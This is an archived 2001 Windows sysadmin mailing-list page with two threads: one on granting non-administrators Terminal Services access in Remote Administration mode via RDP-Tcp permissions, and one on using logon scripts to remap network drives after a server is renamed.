Non-Domain Admins connect to a Win2K Server via Terminal Services in Remote Admin mode? Here's what Mark Minasi found out: I really like Terminal Services for Windows 2000 in the "Remote Administration" mode; it lets up to two people use Terminal Services to remotely control a Windows 2000 Server, and doesn't require me to buy any Terminal Server client licenses. But when you select "Remote Administration" mode for Terminal Services, then Terminal Services only lets members of the Domain Admins group log into Terminal Services. I wanted to let regular old users log in, but didn't know how. While teaching a class for a large communications company this month, I found out how. Open Terminal Services Configuration (it's in Administrative Tools) In the command pane (the left-hand pane of the MMC console), click on "Connections." In the right-hand pane, you'll see an icon representing a connection (a hard disk atop a network connection) and the words "RDP-Tcp," "tcp," and "Microsoft RDP 5.0." Double-click the icon to bring up its Properties dialog, or just right-click the icon and choose "Properties." You'll see a property page labeled "RDP-Tcp Properties." Click the "Permissions" tab. Note that right now, the tab shows only the System account and the local Administrators group. Add any person or group that you like, and they'll be able to log onto the server via Terminal Services. At 11:45 AM 8/17/2001 -0400, you wrote: Sorry for not mentioning this the first time, but Terminal Services is in Admin Mode. In order to accomplish this before, I had to give others Admin rights. Now I don't have to, I can just give them through policies what they need to do.Thanks.Terry Caleb-- Original Message --From: "Kevin Miller" [EMAIL PROTECTED]Reply-To: "NT System Admin Issues" [EMAIL PROTECTED]Date: Fri, 17 Aug 2001 11:34:25 -0700Checking I have a locked down Demo account with no rights logininginto a remote mode TS? I think anyone can login as long as they have thecheck box done.. Or am I just smoking crack?Kevinm QWSZC, VRY+Y, NFH, SAD-VF, DERSDESDFG~~~More letters after my name makes me Smarter.~~~please respond back to rent this ad space for your needs-Original Message-From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Friday, August 17, 2001 8:31 AMTo: NT System Admin IssuesSubject: RE: Access to Terminal ServerI think the issue may be in how Terry originally installed TS - inremote admin mode maybe instead of application server? If remote adminmode, I don't think there is any way around the admin permissions -that's one of MS's way of ensuring you don't bypass proper licensing.-Original Message-From: Kevin Miller [mailto:[EMAIL PROTECTED]]Sent: Friday, August 17, 2001 2:28 PMTo: NT System Admin IssuesSubject: RE: Access to Terminal ServerJust give the user logon to TS rights in there AD profile.Kevinm QWSZC, VRY+Y, NFH, SAD-VF, DERSDESDFG~~~More letters after my name makes me
RE: Changing Mappings after server re-name
Title: RE: Changing Mappings after server re-name I think what they're trying to say is it's difficult to query each machine, get the shares, and then replace them. You might end up spending more time trying to create a sophisticated script than just trying to standardize using, for example, ifmember. How many users are we talking about? -Original Message- From: Tom Grabowski [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 1:20 PM To: NT System Admin Issues Subject: RE: Changing Mappings after server re-name You have all been a great help. Yes I know what net use * /delete does. And it is exactly what I don't want to do. We have users manually mapped because that is the way it thank you for your thought full insight on logon scripts, hmmm, but I thought that was what my initial request stated; Is there a way through 2000 logon scripts or, 3rd party software, that upon logon the users drive mappings can be reviewed and through the use of variables accomplish something like this; and lastly thank you for the Just use net use /delete n: I will go to each workstation find out their mapped drives to the old server and create individual logon scripts for each different development group or department. Trying to eliminate the sneaker net through Logon Scripts Thanks anyway for the assists. If I find a way to do what I want I will post it, maybe what we have here is a failure to communicate. -Original Message- From: Tom Grabowski [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 9:59 AM To: NT System Admin Issues Subject: Changing Mappings after server re-name Does anyone know if it is possible to re-map existing drives through a log on script after changing a server name? This is the situation we have; We are 'upgrading', format, install fresh, and restore information, one of our servers from NT4 to 2000 and in the process we are renaming the server from APPS_SERVER to APPS2, to keep in line with Internet DNS naming standards. I know that there will be numerous people with mapped drives to this server such as Prog on 'Apps_Server' (P:). Is there a way through 2000 logon scripts or, 3rd party software, that upon logon the users drive mappings can be reviewed and through the use of variables accomplish something like this; if %drive_leter% = 'Apps_Server' then net delete 'Apps_Server' and Net Use 'Apps2', to whatever drive letter the directory was originally mapped. We need to use a variable for the drive letter because there are numerous shared directories that are mapped to numerous different Drive Letters, most done manually by department or individual developers. Thanks in advance for any help. Tom Grabowski ** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the e-mail originator. This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses. However, please check this e-mail for virus infection for which CDG Management LLC accepts no responsibility ** http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the e-mail originator. This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses. However, please check this e-mail for virus infection for which CDG Management LLC accepts no responsibility ** http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the e-mail originator. This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses. However, please check this e-mail for virus infection for which CDG Management LLC accepts no responsibility ** http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm